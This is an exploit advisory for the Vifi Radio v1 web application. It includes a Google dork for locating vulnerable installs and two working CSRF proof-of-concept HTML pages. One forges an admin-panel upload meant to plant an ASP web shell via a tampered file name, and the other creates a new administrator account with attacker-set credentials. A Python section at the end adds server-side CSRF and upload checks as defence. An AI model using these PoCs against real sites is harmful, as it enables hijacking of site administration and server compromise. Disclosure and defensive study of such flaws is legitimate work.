Vifi Radio v1 - CSRF Vulnerability
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Vifi Radio
|~Affected Version : v1
|~Software : http://scriptim.org/market-item/vifi-v1-radyo-scripti/ & http://vifibilisim.com/scriptlerimiz-29-Radyo_Siteleri_Icin_Script.html
|~Official Demo : http://radyo.vifibilisim.com
|~RISK : Medium
|~DORK : inurl:index.asp?radyo=2
|~Tested On : [L] Windows 7, Mozilla Firefox
########################################################
Upload.HTML
-----------------------------------------------------------
<!-- The admin panel's upload form copied out of /yonetim, with the action pointed
     at the target. The request carries no anti-CSRF token, so a logged-in admin
     who loads this page from anywhere submits it with their session cookie. The
     only extension filter is the onSubmit handler; checkFileUpload and
     MM_returnValue come from the original page's Dreamweaver script and are not
     defined here. That check runs in the browser, which is why the advisory pairs
     it with Tamper Data: the file is renamed in the request after the browser has
     already accepted it. -->
<html>
<body>
<table width="796">
<tr>
<td width="796" valign="top"><form name="form1" method="post" action="http://[TARGET]/yonetim/djtek_yukle.asp?upload=true&haber=56" enctype="multipart/form-data" onSubmit="checkFileUpload(this,'GIF,JPG,JPEG,BMP,PNG');return document.MM_returnValue">
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td class="baslik"> CSRF with Tamper Data Shell Upload PoC </td>
</tr>
<tr>
<td height="125" align="center" class="menu"><input type="file" name="fmfile" style="width:200px" class="main">
<input name="fmsubmit" type="submit" class="main" value="YÜKLE" /></td>
</tr>
</table>
</form></td>
</tr>
</table>
</body>
</html>
----------------------------------------------------------
PoC
----------------------------------------------------------
<!-- CSRF page for the admin panel's DJ-add form. The original advisory omits the
     <form> tag and does not name the handler script under /yonetim, so the action
     is left as a placeholder to fill in from the target's admin panel. Field names
     are Turkish: rutbe = rank, djadi = DJ name, resim = image, sira = order,
     ilet = send. The advisory marks firma and link as the username and password
     to set, with rutbe=1 as the rank the new account gets. -->
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<form method="post" action="http://[TARGET]/yonetim/[ADD-DJ-SCRIPT].asp" accept-charset="windows-1254">
<input type="hidden" name="rutbe" value="1" />
<input type="hidden" name="djadi" value="0" />
<!-- The advisory shows the next value and the ilet value URL-encoded as captured
     from the request (Vifi+Bili%FEim, G%D6NDER). A form field must carry the
     decoded text, and accept-charset makes the browser send the same windows-1254
     bytes the application expects. -->
<input type="hidden" name="resim" value="Vifi Bilişim" />
<input type="hidden" name="firma" value="USERNAME" />
<input type="hidden" name="link" value="PASSWORD" />
<input type="hidden" name="sira" value="23" />
<input type="hidden" name="ilet" value="GÖNDER" />
<input type="hidden" name="Submit" value="Exploit!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
############################
"Admin Panel: /yonetim "
############################
EXPLOIT: http://0day.today/exploit/24101
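Added example, not code from the advisory or from Vifi Radio: the two server-side checks that both endpoints above lack, written in Python rather than the application's classic ASP so the logic can be run against constructed requests. csrf_ok is the check that would stop both the upload form and the DJ-add PoC; upload_ok redoes the extension filter server-side and adds a magic-byte check, which is what makes the Tamper Data rename useless. SITE_ORIGIN, the request dict layout, the handler name and the sample requests are assumptions of this example.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed origin of the admin panel; the real one is whatever serves /yonetim.
SITE_ORIGIN = "http://radyo.example"

# Extensions the form's onSubmit handler allows, paired with the magic bytes each
# format starts with. The onSubmit check runs in the submitting browser, so the
# server has to redo it and must not trust the extension alone.
IMAGE_SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "bmp": (b"BM",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}


def new_csrf_token():
    """Per-session token: stored server-side and echoed as a hidden form field."""
    return secrets.token_urlsafe(32)


def csrf_ok(request, session_token):
    """Synchronizer-token check plus an Origin/Referer check for a state-changing POST.

    `request` is a constructed dict with "headers", "form" and "files" keys (an
    assumption of this example, not the ASP Request object).
    """
    form_token = request["form"].get("csrf", "")
    if not session_token or not form_token:
        return False
    if not hmac.compare_digest(session_token.encode(), form_token.encode()):
        return False
    # A browser sends Origin (or at least Referer) on cross-site form posts; a
    # request carrying neither is refused rather than waved through.
    source = request["headers"].get("Origin") or request["headers"].get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SITE_ORIGIN


def upload_ok(filename, content):
    """Whitelist the extension AND require matching magic bytes.

    The client-supplied Content-Type is ignored: Tamper Data can set it to anything.
    """
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any path component
    if "\x00" in name or ";" in name or "." not in name:
        return False
    ext = name.rsplit(".", 1)[1].lower()
    signatures = IMAGE_SIGNATURES.get(ext)
    if not signatures:
        return False
    return any(content.startswith(sig) for sig in signatures)


def handle_upload(request, session_token):
    """Hardened shape of the djtek_yukle.asp flow: reject before touching the file."""
    if not csrf_ok(request, session_token):
        return 403, "csrf check failed"
    upload = request["files"].get("fmfile")
    if upload is None or not upload_ok(upload["filename"], upload["content"]):
        return 400, "not an allowed image"
    return 200, "stored"


def demo():
    """Three constructed requests against the hardened handler."""
    token = new_csrf_token()
    # 1. The advisory's Upload.HTML served from an attacker site: the victim's browser
    #    attaches the admin session cookie but sends no token and a foreign Origin.
    forged = {
        "headers": {"Origin": "http://attacker.example"},
        "form": {},
        "files": {"fmfile": {"filename": "shell.asp", "content": b"<% %>"}},
    }
    # 2. An admin's own browser with a valid token, but the file renamed after the
    #    onSubmit check, the way a Tamper Data edit would send it.
    renamed = {
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"csrf": token},
        "files": {"fmfile": {"filename": "shell.asp;.jpg", "content": b"<% %>"}},
    }
    # 3. A legitimate PNG (8-byte signature plus filler).
    legit = {
        "headers": {"Origin": SITE_ORIGIN},
        "form": {"csrf": token},
        "files": {"fmfile": {"filename": "logo.png",
                             "content": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16}},
    }
    return [handle_upload(r, token)[0] for r in (forged, renamed, legit)]


if __name__ == "__main__":
    print(demo())
```

demo() returns the status codes for the three requests in order: the cross-site post is refused at the token check, the same-site renamed file is refused at the magic-byte check, and the real PNG is accepted. In classic ASP the equivalents are a value kept in Session and compared against Request.Form, Request.ServerVariables("HTTP_ORIGIN") / ("HTTP_REFERER") for the origin, and reading the first bytes of the uploaded stream before writing it anywhere under the web root.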